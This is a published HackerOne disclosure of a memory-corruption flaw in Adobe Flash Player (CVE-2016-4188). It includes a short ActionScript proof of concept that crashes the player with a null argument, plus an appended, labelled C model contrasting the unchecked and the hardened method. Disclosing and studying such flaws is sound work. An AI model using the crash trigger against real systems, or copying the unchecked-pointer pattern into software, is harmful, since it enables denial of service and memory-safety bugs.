Internet Bug Bounty: Adobe Flash Player ShimAdPolicySelector(adPolicySelectorType=0) class Memory Corruption

HackerOne report H1:151040, reported by hhj4ck, published Jul 13, 2016 02:47
Source: hackerone.com
EPSS: 0.014 (percentile 86.7%)

I. Summary
Adobe Flash Player is prone to a memory corruption vulnerability caused by improper validation in ShimAdPolicySelector.selectAdBreaksToPlay().

II. Description
Normally, selectAdBreaksToPlay() should validate its parameter and return an error at the AS3 level if anything is wrong.
However, if ShimAdPolicySelector is constructed with adPolicySelectorType=0, some of its inner fields are never set up. Invoking selectAdBreaksToPlay() on such an object with an invalid AdPolicyInfo instance (in the PoC below, a null reference) makes the player use those absent fields anyway, which causes a memory crash instead of a clean AS3 error.

POC Source Code:

package
{
	import com.adobe.tvsdk.mediacore.MediaPlayerItem;
	import com.adobe.tvsdk.mediacore.timeline.advertising.policy.AdPolicyInfo;
	import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;
	import flash.display.Sprite;

	public class poc extends Sprite
	{
		public function poc()
		{
			// Both locals are declared but never assigned, so they are null references.
			var mp:MediaPlayerItem;
			var ap:AdPolicyInfo;
			// adPolicySelectorType=0 is the constructor path that leaves inner fields unset.
			var obj:ShimAdPolicySelector = new ShimAdPolicySelector(0, mp);
			// Passing the null AdPolicyInfo to the type-0 selector triggers the crash.
			obj.selectAdBreaksToPlay(ap);
		}
	}
}
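The validation gap described above, modelled in C as an added example (a constructed illustration, not Adobe's code and not the reporter's PoC): a selector whose type-0 constructor path leaves an inner field null, the method shape that dereferences that field and its argument without checking, and the hardened form that checks every pointer the native path will touch and returns an error the caller can handle. All struct names, fields, error codes and sample policy values are assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the objects named in the advisory. Names and fields are
 * assumptions for illustration, not Adobe's implementation. */
typedef struct {
    int      break_count;   /* number of ad breaks the policy allows */
    uint32_t break_mask;    /* bitmask of which breaks to play */
} AdPolicyInfo;

typedef struct {
    const char *url;        /* stand-in for the media item's content */
} MediaPlayerItem;

typedef struct {
    int              type;  /* adPolicySelectorType passed to the constructor */
    MediaPlayerItem *item;  /* may be null, as in the PoC */
    AdPolicyInfo    *state; /* inner selector state; left null when type == 0 */
} ShimAdPolicySelector;

enum {
    AD_OK                = 0,
    AD_ERR_NULL_SELECTOR = -1,
    AD_ERR_NULL_POLICY   = -2,
    AD_ERR_NO_ITEM       = -3,
    AD_ERR_UNINITIALIZED = -4
};

/* Constructor mirroring the advisory's description: a type-0 selector skips
 * setting up its inner state, so a later method call finds a null field. */
void shim_init(ShimAdPolicySelector *s, int type, MediaPlayerItem *item,
               AdPolicyInfo *backing_state)
{
    memset(s, 0, sizeof *s);
    s->type = type;
    s->item = item;
    if (type != 0)
        s->state = backing_state;   /* type 0 leaves state == NULL */
}

/* Vulnerable shape: trusts that the constructor initialised everything and that
 * the caller passed a live AdPolicyInfo. With type 0 or a null policy this
 * dereferences NULL. Kept for comparison only; nothing below calls it. */
uint32_t select_ad_breaks_vuln(ShimAdPolicySelector *s, AdPolicyInfo *policy)
{
    s->state->break_count = policy->break_count;
    return policy->break_mask & 0xFFu;
}

/* Hardened shape: every pointer the native path touches is checked first and
 * the failure is reported to the caller instead of crashing the process. */
int select_ad_breaks_safe(ShimAdPolicySelector *s, AdPolicyInfo *policy, uint32_t *out)
{
    if (s == NULL || out == NULL) return AD_ERR_NULL_SELECTOR;
    if (policy == NULL)           return AD_ERR_NULL_POLICY;
    if (s->item == NULL)          return AD_ERR_NO_ITEM;
    if (s->state == NULL)         return AD_ERR_UNINITIALIZED;
    s->state->break_count = policy->break_count;
    *out = policy->break_mask & 0xFFu;
    return AD_OK;
}

/* Drives one scenario against the hardened method. has_item/has_policy model
 * the PoC's unassigned (null) locals. Sample values are constructed. */
int run_case(int type, int has_item, int has_policy, uint32_t *out)
{
    MediaPlayerItem item = { "https://example.invalid/stream.f4m" };
    AdPolicyInfo policy = { 3, 0x1F5u };
    AdPolicyInfo backing = { 0, 0 };
    ShimAdPolicySelector s;
    shim_init(&s, type, has_item ? &item : NULL, &backing);
    return select_ad_breaks_safe(&s, has_policy ? &policy : NULL, out);
}

int main(void)
{
    uint32_t out = 0;
    /* Same sequence as the PoC: type 0, null MediaPlayerItem, null AdPolicyInfo. */
    printf("poc sequence       -> %d\n", run_case(0, 0, 0, &out));
    printf("type 0, valid args -> %d\n", run_case(0, 1, 1, &out));
    printf("type 1, valid args -> %d (mask 0x%02x)\n", run_case(1, 1, 1, &out), out);
    return 0;
}
```

The point of the hardened form is that a missing inner field is treated as an error condition in its own right: checking only the caller's argument would still crash on the type-0 object with a valid AdPolicyInfo, so the method has to verify its own invariants as well as its input.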

III. Impact
Memory corruption: Flash Player crashes when the PoC runs.

IV. Affected
Adobe Flash Player 21.0.0.242.

V. Credit
Wen Guanxing of Pangu LAB is credited with this vulnerability.

Adobe assigned it CVE-2016-4188 and addressed it in security bulletin APSB16-25:
https://helpx.adobe.com/security/products/flash-player/apsb16-25.html